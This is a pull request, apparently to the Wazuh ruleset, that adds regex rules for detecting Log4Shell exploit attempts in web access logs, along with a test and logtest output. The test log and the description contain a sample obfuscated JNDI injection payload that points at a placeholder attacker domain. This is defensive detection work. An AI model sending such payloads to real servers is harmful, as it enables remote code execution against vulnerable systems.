### PR TITLE
Added log4shell rule and the test

### DIFF
--- a/ruleset/rules/0245-web_rules.xml
+++ b/ruleset/rules/0245-web_rules.xml
@@ -344,4 +344,29 @@
    <group>attack,sqlinjection,pci_dss_6.5,pci_dss_11.4,pci_dss_6.5.1,gdpr_IV_35.7.d,</group>
   </rule>
 
+  <!--
+    Log4Shell exploit attempt
+  -->
+  <rule id="31172" level="7">
+    <if_group>web|accesslog|attack</if_group>
+    <regex type="pcre2">(?i)(((\$|24)\S*)((\{|7B)\S*)((\S*j\S*n\S*d\S*i))|JHtqbmRp)</regex>
+    <description>Possible Log4j RCE attack attempt detected.</description>
+    <mitre>
+      <id>T1190</id>
+      <id>T1210</id>
+      <id>T1211</id>
+    </mitre>
+  </rule>
+
+  <rule id="31173" level="12">
+    <if_sid>31172</if_sid>
+    <regex type="pcre2">ldap[s]?|rmi|dns|nis|iiop|corba|nds|http|lower|upper|(\$\{\S*\w\}\S*)+</regex>
+    <description>Log4j RCE attack attempt detected.</description>
+    <mitre>
+      <id>T1190</id>
+      <id>T1210</id>
+      <id>T1211</id>
+    </mitre>
+  </rule>
+
 </group>

--- a/ruleset/testing/tests/web_rules.ini
+++ b/ruleset/testing/tests/web_rules.ini
@@ -57,3 +57,9 @@ log 1 pass = www.example.com:80 1.1.1.1 - - [12/Mar/2019:10:09:12 +0000] "GET /e
 rule = 31171
 alert = 6
 decoder = web-accesslog
+
+[Log4Shell exploit attempt]
+log 1 pass = 192.168.1.1 - - [13/Dec/2021:13:13:58 -0500] "GET /?x=${jndi:${lower:l}${lower:d}a${lower:p}://[attacker_domain/file} HTTP/1.1" 200 879 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
+rule = 31173
+alert = 12
+decoder = web-accesslog


### PR DESCRIPTION
Added the log4shell detection rule to 0245-web_rules.xml and modified the web_rules.ini file to add the test log.

|Related issue|
|---|
||

<!--
This template reflects sections that must be included in new Pull requests.
Contributions from the community are really appreciated. If this is the case, please add the
"contribution" to properly track the Pull Request.

Please fill the table above. Feel free to extend it at your convenience.
-->

## Description

This PR is meant to add the rule for Log4Shell exploit detection capability.

## Logs/Alerts example

Wazuh logtest gives the following output:

```
root@wazuh-server:/var/ossec/bin# ./wazuh-logtest
Starting wazuh-logtest v4.3.0
Type one log per line

192.168.1.1 - - [13/Dec/2021:13:13:58 -0500] "GET /?x=${jndi:${lower:l}${lower:d}a${lower:p}://[attacker_domain/file} HTTP/1.1" 200 879 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"

**Phase 1: Completed pre-decoding.
	full event: '192.168.1.1 - - [13/Dec/2021:13:13:58 -0500] "GET /?x=${jndi:${lower:l}${lower:d}a${lower:p}://[attacker_domain/file} HTTP/1.1" 200 879 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"'

**Phase 2: Completed decoding.
	name: 'web-accesslog'
	id: '200'
	protocol: 'GET'
	srcip: '192.168.1.1'
	url: '/?x=${jndi:${lower:l}${lower:d}a${lower:p}://[attacker_domain/file}'

**Phase 3: Completed filtering (rules).
	id: '31173'
	level: '12'
	description: 'Log4j RCE attack attempt detected.'
	groups: '['web', 'accesslog']'
	firedtimes: '1'
	mail: 'True'
	mitre.id: '['T1190', 'T1210', 'T1211']'
	mitre.tactic: '['Initial Access', 'Lateral Movement', 'Defense Evasion']'
	mitre.technique: '['Exploit Public-Facing Application', 'Exploitation of Remote Services', 'Exploitation for Defense Evasion']'
**Alert to be generated.
```

## Tests

<!-- Ruleset required checks, rules/decoder -->
- Decoder/Rule tests
  - [X] Added unit testing files ".ini"
  - [X] runtests.py executed without errors

## Unit testing

Runtest.py passes as shown in the output:
```
user1@wazuh-server:~/Github/wazuh/ruleset/testing$ sudo python2 runtests.py --testfile tests/web_rules.ini 
[sudo] password for user1: 
- [ File = ./tests/web_rules.ini ] ---------
...........
```

## E2E testing

Security event dashboard after alert is generated:
![security-event-dashboard1](https://user-images.githubusercontent.com/48957591/150117757-bff3b543-92b3-4e72-9a74-4cce78f5335e.png)

Security even list showing the alert:

![security-event-list](https://user-images.githubusercontent.com/48957591/150117921-dc08277e-c9f5-4a1d-b5d0-be7b872e90b3.png)

